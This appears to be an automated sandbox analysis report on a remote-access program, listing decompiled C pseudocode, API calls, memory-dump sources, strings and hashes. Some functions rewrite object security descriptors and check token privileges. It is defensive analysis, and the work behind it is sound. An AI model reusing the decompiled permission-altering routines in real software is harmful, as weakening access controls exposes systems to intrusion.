                                                                                                                        0x6f3320e9
                                                                                                                        0x6f3320ed
                                                                                                                        0x6f332103
                                                                                                                        0x6f332109
                                                                                                                        0x6f332117
                                                                                                                        0x00000000
                                                                                                                        0x6f332117
                                                                                                                        0x6f3320ef
                                                                                                                        0x6f3320fb
                                                                                                                        0x6f33211d
                                                                                                                        0x6f332121
                                                                                                                        0x6f332123
                                                                                                                        0x6f332123
                                                                                                                        0x6f3320ed
                                                                                                                        0x6f33212d
                                                                                                                        0x6f33212d
                                                                                                                        0x6f33213c
                                                                                                                        0x6f332039
                                                                                                                        0x6f332039
                                                                                                                        0x6f33203f
                                                                                                                        0x6f33203f
                                                                                                                        0x6f332035

                                                                                                                        APIs
                                                                                                                        • GetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?), ref: 6F33202D
                                                                                                                        • GetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?), ref: 6F33205D
                                                                                                                        • GetProcessHeap.KERNEL32 ref: 6F332074
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33207B
                                                                                                                        • CreateWellKnownSid.ADVAPI32(00000001,00000000,00000000,?), ref: 6F332094
                                                                                                                        • SetEntriesInAclA.ADVAPI32(00000001,?,?,00000044), ref: 6F3320DF
                                                                                                                        • SetSecurityInfo.ADVAPI32(00000000,?,00000004,00000000,00000000,00000044,00000000), ref: 6F3320FB
                                                                                                                        • SetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,00000044,00000000), ref: 6F332117
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332126
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33212D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInfoSecurity$NamedProcess$AllocCreateEntriesFreeKnownWell
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 1714474399-2746444292
                                                                                                                        • Opcode ID: fd6abdba64809bd2c693e6abda943a493432fb084201ac637837d951c7251a55
                                                                                                                        • Instruction ID: d811240a3e099263e6a1628e8a8cff13de36a9642bc120c27838345c56475953
                                                                                                                        • Opcode Fuzzy Hash: fd6abdba64809bd2c693e6abda943a493432fb084201ac637837d951c7251a55
                                                                                                                        • Instruction Fuzzy Hash: 354108B2604399AFE710CF54CD88E6BBBBDEB85B98F40481DF641C6140D676EC488B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334760, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 250memorycomstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 64%
                                                                                                                        			E6F334760() {
				char _v8;
				char _v12;
				char _v16;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				void* _v44;
				intOrPtr _v48;
				void* _v52;
				intOrPtr _v60;
				char _v64;
				intOrPtr* _v68;
				char _v76;
				intOrPtr _v80;
				void* _v84;
				WCHAR* _v92;
				intOrPtr* _v104;
				intOrPtr* _v112;
				intOrPtr* _v120;
				intOrPtr* _v128;
				intOrPtr* _v136;
				intOrPtr* _v144;
				intOrPtr* _v148;
				intOrPtr _v152;
				intOrPtr* _v160;
				char* _t80;
				intOrPtr* _t82;
				void* _t84;
				intOrPtr* _t85;
				intOrPtr* _t88;
				intOrPtr* _t92;
				intOrPtr* _t95;
				void* _t97;
				char* _t98;
				intOrPtr _t99;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				void* _t114;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t120;
				int _t123;
				intOrPtr* _t124;
				intOrPtr* _t126;
				WCHAR* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				signed int _t134;
				void* _t136;
				intOrPtr* _t138;
				intOrPtr* _t161;
				char _t185;
				void* _t186;
				void* _t187;
				char _t189;
				char _t190;
				signed int* _t191;
				void* _t192;
				WCHAR* _t194;

				_t80 =  &_v16;
				_t185 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				__imp__CoCreateInstance(0x6f33e0bc, 0, 1, 0x6f33e07c, _t80); // executed
				if(_t80 < 0) {
					L35:
					return _v32;
				}
				_t82 = _v36;
				_v24 = 0;
				_t84 =  *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x1c))))(_t82,  &_v24, _t187, _t192); // executed
				if(_t84 < 0) {
					L10:
					_t85 = _v44;
					_v52 = _t185;
					_push( &_v52);
					_push(_t85);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x48))))() < 0) {
						L34:
						_t88 = _v52;
						 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
						if(_v48 != _t185) {
							return 1;
						}
						goto L35;
					}
					_t138 = __imp__#2;
					_t194 =  *_t138(_v28);
					if(_t194 == _t185) {
						L33:
						_t92 = _v64;
						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
						goto L34;
					}
					_t186 =  *_t138(_v28);
					_t189 = 0;
					if(_t186 == 0) {
						L32:
						__imp__#6(_t194);
						_t185 = 0;
						goto L33;
					}
					_t95 = _v68;
					_v64 = 0;
					_t97 =  *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x28))))(_t95, _t186,  &_v64); // executed
					if(_t97 < 0) {
						L21:
						if(_v52 != _t189) {
							_t98 =  &_v84;
							_v84 = _t189;
							__imp__CoCreateInstance(0x6f33e09c, _t189, 1, 0x6f33e06c, _t98); // executed
							if(_t98 >= 0) {
								_t99 = _v60;
								if(_t99 != 0) {
									_t189 =  *_t138(_t99);
								}
								_t100 = _v104;
								 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x30))))(_t100, _t194); // executed
								_t102 = _v112;
								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 0x20))))(_t102, _t186);
								if(_t189 != 0) {
									_t117 = _v120;
									 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x28))))(_t117, _t189);
								}
								_t104 = _v120;
								 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x40))))(_t104, 0x100);
								_t106 = _v128;
								 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x98))))(_t106, 0x7fffffff);
								_t108 = _v136;
								 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0xa8))))(_t108, 1);
								_t110 = _v144;
								 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x88))))(_t110, 0xffffffff);
								_t112 = _v148;
								_t114 =  *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x20))))(_t112, _v152); // executed
								if(_t114 >= 0) {
									_v144 = 1;
								}
								_t115 = _v160;
								 *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))(_t115);
								if(_t189 != 0) {
									__imp__#6(_t189);
								}
							}
						}
						L31:
						__imp__#6(_t186);
						goto L32;
					}
					_t120 = _v76;
					_v84 = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 0x2c))))(_t120,  &_v84);
					_t123 = lstrcmpiW(_t194, _v92);
					_t190 = _v44;
					if(_t123 == 0) {
						if(_t190 == 0) {
							_t130 = _v84;
							_v76 = _t190;
							 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0x84))))(_t130,  &_v76);
							if(_v84 == _t190) {
								_t132 = _v92;
								 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x88))))(_t132, 0xffffffff);
							}
						}
						_v76 = 1;
					}
					_t124 = _v84;
					 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
					if(_v80 != 0) {
						if(_t190 != 0) {
							_t126 = _v92;
							 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0x24))))(_t126, _t186);
						}
						goto L31;
					} else {
						_t128 = _v92;
						 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 0x24))))(_t128, _t186);
						_t189 = 0;
						goto L21;
					}
				} else {
					_t191 = 0x6f33d820;
					do {
						_t134 =  *_t191;
						if((_v32 & _t134) == 0) {
							goto L7;
						}
						_t161 = _v44;
						_v36 = _t185;
						_t136 =  *((intOrPtr*)( *((intOrPtr*)( *_t161 + 0x20))))(_t161, _t134,  &_v36); // executed
						if(_t136 < 0 || _v48 != _t185) {
							_v48 = _t185;
							goto L10;
						} else {
							_v48 = 1;
						}
						L7:
						_t191 =  &(_t191[1]);
					} while (_t191 < "\"%s\" f");
					goto L10;
				}
			}




































































                                                                                                                        0x6f334765
                                                                                                                        0x6f33476f
                                                                                                                        0x6f33477d
                                                                                                                        0x6f334781
                                                                                                                        0x6f334785
                                                                                                                        0x6f334789
                                                                                                                        0x6f334791
                                                                                                                        0x6f3349fb
                                                                                                                        0x00000000
                                                                                                                        0x6f3349fb
                                                                                                                        0x6f334797
                                                                                                                        0x6f3347a1
                                                                                                                        0x6f3347ac
                                                                                                                        0x6f3347b0
                                                                                                                        0x6f3347f5
                                                                                                                        0x6f3347f5
                                                                                                                        0x6f3347fd
                                                                                                                        0x6f334803
                                                                                                                        0x6f334804
                                                                                                                        0x6f33480c
                                                                                                                        0x6f3349e2
                                                                                                                        0x6f3349e2
                                                                                                                        0x6f3349ec
                                                                                                                        0x6f3349f9
                                                                                                                        0x6f334a04
                                                                                                                        0x6f334a04
                                                                                                                        0x00000000
                                                                                                                        0x6f3349f9
                                                                                                                        0x6f334816
                                                                                                                        0x6f33481f
                                                                                                                        0x6f334823
                                                                                                                        0x6f3349d6
                                                                                                                        0x6f3349d6
                                                                                                                        0x6f3349e0
                                                                                                                        0x00000000
                                                                                                                        0x6f3349e0
                                                                                                                        0x6f334830
                                                                                                                        0x6f334832
                                                                                                                        0x6f334836
                                                                                                                        0x6f3349cd
                                                                                                                        0x6f3349ce
                                                                                                                        0x6f3349d4
                                                                                                                        0x00000000
                                                                                                                        0x6f3349d4
                                                                                                                        0x6f33483c
                                                                                                                        0x6f334845
                                                                                                                        0x6f334850
                                                                                                                        0x6f334854
                                                                                                                        0x6f3348e5
                                                                                                                        0x6f3348e9
                                                                                                                        0x6f3348ef
                                                                                                                        0x6f334901
                                                                                                                        0x6f334905
                                                                                                                        0x6f33490d
                                                                                                                        0x6f334913
                                                                                                                        0x6f334919
                                                                                                                        0x6f33491e
                                                                                                                        0x6f33491e
                                                                                                                        0x6f334920
                                                                                                                        0x6f33492b
                                                                                                                        0x6f33492d
                                                                                                                        0x6f334938
                                                                                                                        0x6f33493c
                                                                                                                        0x6f33493e
                                                                                                                        0x6f334949
                                                                                                                        0x6f334949
                                                                                                                        0x6f33494b
                                                                                                                        0x6f33495a
                                                                                                                        0x6f33495c
                                                                                                                        0x6f33496e
                                                                                                                        0x6f334970
                                                                                                                        0x6f33497f
                                                                                                                        0x6f334981
                                                                                                                        0x6f334990
                                                                                                                        0x6f334992
                                                                                                                        0x6f3349a1
                                                                                                                        0x6f3349a5
                                                                                                                        0x6f3349a7
                                                                                                                        0x6f3349a7
                                                                                                                        0x6f3349af
                                                                                                                        0x6f3349b9
                                                                                                                        0x6f3349bd
                                                                                                                        0x6f3349c0
                                                                                                                        0x6f3349c0
                                                                                                                        0x6f3349bd
                                                                                                                        0x6f33490d
                                                                                                                        0x6f3349c6
                                                                                                                        0x6f3349c7
                                                                                                                        0x00000000
                                                                                                                        0x6f3349c7
                                                                                                                        0x6f33485a
                                                                                                                        0x6f334862
                                                                                                                        0x6f33486d
                                                                                                                        0x6f334875
                                                                                                                        0x6f33487b
                                                                                                                        0x6f334881
                                                                                                                        0x6f334885
                                                                                                                        0x6f334887
                                                                                                                        0x6f33488f
                                                                                                                        0x6f33489d
                                                                                                                        0x6f3348a4
                                                                                                                        0x6f3348a6
                                                                                                                        0x6f3348b5
                                                                                                                        0x6f3348b5
                                                                                                                        0x6f3348a4
                                                                                                                        0x6f3348b7
                                                                                                                        0x6f3348b7
                                                                                                                        0x6f3348bf
                                                                                                                        0x6f3348c9
                                                                                                                        0x6f3348d0
                                                                                                                        0x6f334a07
                                                                                                                        0x6f334a09
                                                                                                                        0x6f334a14
                                                                                                                        0x6f334a14
                                                                                                                        0x00000000
                                                                                                                        0x6f3348d6
                                                                                                                        0x6f3348d6
                                                                                                                        0x6f3348e1
                                                                                                                        0x6f3348e3
                                                                                                                        0x00000000
                                                                                                                        0x6f3348e3
                                                                                                                        0x6f3347b2
                                                                                                                        0x6f3347b2
                                                                                                                        0x6f3347b7
                                                                                                                        0x6f3347b7
                                                                                                                        0x6f3347bd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3347bf
                                                                                                                        0x6f3347c8
                                                                                                                        0x6f3347d3
                                                                                                                        0x6f3347d7
                                                                                                                        0x6f3347f1
                                                                                                                        0x00000000
                                                                                                                        0x6f3347e0
                                                                                                                        0x6f3347e0
                                                                                                                        0x6f3347e0
                                                                                                                        0x6f3347e4
                                                                                                                        0x6f3347e4
                                                                                                                        0x6f3347e7
                                                                                                                        0x00000000
                                                                                                                        0x6f3347b7

                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(6F33E0BC,00000000,00000001,6F33E07C,?,?,?,?,6F334C88,?,?,?,?,00000001), ref: 6F334789
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F33481D
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F33482E
                                                                                                                        • lstrcmpiW.KERNEL32(00000000,?,?,6F334C88,?,?,?,?,00000001), ref: 6F334875
                                                                                                                        • CoCreateInstance.OLE32(6F33E09C,00000000,00000001,6F33E06C,?,?,6F334C88,?,?,?,?,00000001), ref: 6F334905
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F33491C
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F3349C0
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F3349C7
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F3349CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocFree$CreateInstance$lstrcmpi
                                                                                                                        • String ID: "%s" f
                                                                                                                        • API String ID: 1501015606-2173819097
                                                                                                                        • Opcode ID: 23e562c0d6e06a2b06c6cb59018d78ac48cc03348a408a496fdc118bddb327dd
                                                                                                                        • Instruction ID: c32771a2695a69ceee25197c93ab087ed40e667b8df5f0d45bdcb0e6e172035b
                                                                                                                        • Opcode Fuzzy Hash: 23e562c0d6e06a2b06c6cb59018d78ac48cc03348a408a496fdc118bddb327dd
                                                                                                                        • Instruction Fuzzy Hash: A9911576A047529FC200DF69C880D5BB7E9BFC9704F104A4DF5958B264DB32E846CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004C23D1, Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 198COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C23DB
                                                                                                                          • Part of subcall function 004D85BC: __EH_prolog3.LIBCMT ref: 004D85C3
                                                                                                                          • Part of subcall function 004D85BC: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,00000008,004C2410), ref: 004D85F6
                                                                                                                          • Part of subcall function 004D8D4F: __EH_prolog3_catch_GS.LIBCMT ref: 004D8D56
                                                                                                                          • Part of subcall function 004D8D4F: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,0000003C,004D8EFD,?,?), ref: 004D8DAB
                                                                                                                          • Part of subcall function 004D8D4F: _wmemset.LIBCPMT ref: 004D8DEE
                                                                                                                          • Part of subcall function 004D8D4F: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004D8E13
                                                                                                                          • Part of subcall function 00404186: __EH_prolog3.LIBCMT ref: 0040418D
                                                                                                                          • Part of subcall function 004B597B: __EH_prolog3_GS.LIBCMT ref: 004B5982
                                                                                                                          • Part of subcall function 00401504: __EH_prolog3.LIBCMT ref: 0040150B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$QueryValue$H_prolog3_H_prolog3_catch__wmemset
                                                                                                                        • String ID: Init: Load Registry Proxy Settings failed (.\Global.cpp, 685)$ProxyPassword$ProxyPasswordAES$ProxyPasswordSecure$ProxyUsername$Proxy_Exceptions$Proxy_IP$Proxy_IPIE$Proxy_Type
                                                                                                                        • API String ID: 2336546291-1449184549
                                                                                                                        • Opcode ID: d40650014a79fc69b7d69a2adb29391599e5dd7d2ea6d6a2ed6fbe4427310674
                                                                                                                        • Instruction ID: 4eb981286a0cb3f2b9a51b73bebf72b59e17a6e9c12f6f4a10bf5902cb55b58d
                                                                                                                        • Opcode Fuzzy Hash: d40650014a79fc69b7d69a2adb29391599e5dd7d2ea6d6a2ed6fbe4427310674
                                                                                                                        • Instruction Fuzzy Hash: 12715C71D40244EADB14FFA9CA56BDD7B75AF11708F10406EE001672E2DBB85F08D79A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0059F2FF, Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 299windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TranslateMessage.USER32(?), ref: 0059F418
                                                                                                                        • DispatchMessageW.USER32(?), ref: 0059F423
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059F431
                                                                                                                        Strings
                                                                                                                        • EventSink.ListenForEvents: Unadvise failed with error %1% (facility %2%) (.\EventSink.cpp, 165), xrefs: 0059F45D
                                                                                                                        • EventSink.ListenForEvents: QueryInterface failed with error %1% (facility %2%) (.\EventSink.cpp, 188), xrefs: 0059F616
                                                                                                                        • EventSink.ListenForEvents: FindConnectionPoint failed with error %1% (facility %2%) (.\EventSink.cpp, 182), xrefs: 0059F596
                                                                                                                        • EventSink.ListenForEvents: QueryInterface failed with error %1% (facility %2%) (.\EventSink.cpp, 176), xrefs: 0059F51D
                                                                                                                        • EventSink.ListenForEvents: Advise failed with error %1% (facility %2%) (.\EventSink.cpp, 170), xrefs: 0059F4C8
                                                                                                                        • EventSink.ListenForEvents: CoCreateInstance failed with error %1% (facility %2%) (.\EventSink.cpp, 195), xrefs: 0059F699
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DispatchTranslate
                                                                                                                        • String ID: EventSink.ListenForEvents: Advise failed with error %1% (facility %2%) (.\EventSink.cpp, 170)$EventSink.ListenForEvents: CoCreateInstance failed with error %1% (facility %2%) (.\EventSink.cpp, 195)$EventSink.ListenForEvents: FindConnectionPoint failed with error %1% (facility %2%) (.\EventSink.cpp, 182)$EventSink.ListenForEvents: QueryInterface failed with error %1% (facility %2%) (.\EventSink.cpp, 176)$EventSink.ListenForEvents: QueryInterface failed with error %1% (facility %2%) (.\EventSink.cpp, 188)$EventSink.ListenForEvents: Unadvise failed with error %1% (facility %2%) (.\EventSink.cpp, 165)
                                                                                                                        • API String ID: 1706434739-2046564585
                                                                                                                        • Opcode ID: 43cbab10ef7d4a64d7151b4f4e5a7e5f6c6bdd1ccb4c6e7771aebeaa2555279a
                                                                                                                        • Instruction ID: b662efda282acd704f288cc07c344a66b61c2c4ea224bf35853cd6634b79e8e2
                                                                                                                        • Opcode Fuzzy Hash: 43cbab10ef7d4a64d7151b4f4e5a7e5f6c6bdd1ccb4c6e7771aebeaa2555279a
                                                                                                                        • Instruction Fuzzy Hash: 23B173B15083819FD720DF64C849B9EBBE9AF98314F140E2DF589C7282EB78D548C726
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004C08ED, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 121networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C08F4
                                                                                                                          • Part of subcall function 004BD13E: __EH_prolog3.LIBCMT ref: 004BD145
                                                                                                                        • InternetCloseHandle.WININET(?), ref: 004C0973
                                                                                                                        • InternetOpenW.WININET(-00000004), ref: 004C09BE
                                                                                                                        • InternetSetOptionW.WININET(00000000,00000049,?,00000004), ref: 004C09F2
                                                                                                                        • InternetSetOptionW.WININET(00000000,0000004A,00000014,00000004), ref: 004C09FD
                                                                                                                        • InternetSetOptionW.WININET(?,00000002,?,00000004), ref: 004C0A1A
                                                                                                                        • InternetSetOptionW.WININET(?,00000005,00002328,00000004), ref: 004C0A29
                                                                                                                        • InternetSetOptionW.WININET(?,00000006,0001D4C0,00000004), ref: 004C0A38
                                                                                                                        Strings
                                                                                                                        • Mozilla/4.0 (compatible; MSIE 6.0; DynGate), xrefs: 004C098B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$Option$H_prolog3$CloseHandleOpen
                                                                                                                        • String ID: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                        • API String ID: 1037293847-385611765
                                                                                                                        • Opcode ID: 90e27d75eda2ba1f953f2dce45877ea9079048077649ac18ec512aaa74110282
                                                                                                                        • Instruction ID: a9245877e6b401a6c61c8af2d1480b8a469057b773e8c57abfe80e1662820dad
                                                                                                                        • Opcode Fuzzy Hash: 90e27d75eda2ba1f953f2dce45877ea9079048077649ac18ec512aaa74110282
                                                                                                                        • Instruction Fuzzy Hash: 0A41D1B6900706EBEB60EBA4CC46FFFB7B8EB44710F10452EE251A6291D7785A41CB64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333280, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 89COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 68%
                                                                                                                        			E6F333280(void* _a4) {
				void _v0;
				void* _v16;
				void _v72;
				long _v76;
				long _v80;
				long _v84;
				void* _v88;
				char _v96;
				DWORD* _t32;
				int _t36;
				long _t52;

				_t52 = _a4;
				_v76 = 0;
				_v84 = _t52;
				if(_t52 != 0 || OpenProcessToken(0xffffffff, 0xa,  &_v84) != 0) {
					_a4 = 0;
					_v80 = 0;
					if( *0x6f34027c <= 5) {
						L7:
						DuplicateToken(_v84, 1,  &_a4);
						if(_v0 != 0) {
							goto L8;
						}
					} else {
						_t36 = GetTokenInformation(_v84, 0x12,  &_v72, 4,  &_v80); // executed
						if(_t36 != 0 && _v76 == 3) {
							GetTokenInformation(_v88, 0x13,  &_v0, 4,  &_v84);
						}
						if(_v0 != 0) {
							L8:
							_t32 =  &_v84;
							_v84 = 0x44;
							__imp__CreateWellKnownSid(0x1a, 0,  &_v72, _t32);
							if(_t32 != 0) {
								__imp__CheckTokenMembership(_v16,  &_v88,  &_v96);
							}
							FindCloseChangeNotification(_v16); // executed
						} else {
							goto L7;
						}
					}
					if(_t52 == 0) {
						CloseHandle(_v88);
					}
					return _v80;
				} else {
					return _v76;
				}
			}














                                                                                                                        0x6f333284
                                                                                                                        0x6f333288
                                                                                                                        0x6f333290
                                                                                                                        0x6f333296
                                                                                                                        0x6f3332bd
                                                                                                                        0x6f3332c5
                                                                                                                        0x6f3332cd
                                                                                                                        0x6f333313
                                                                                                                        0x6f33331f
                                                                                                                        0x6f33332a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3332cf
                                                                                                                        0x6f3332e9
                                                                                                                        0x6f3332ed
                                                                                                                        0x6f333309
                                                                                                                        0x6f333309
                                                                                                                        0x6f333311
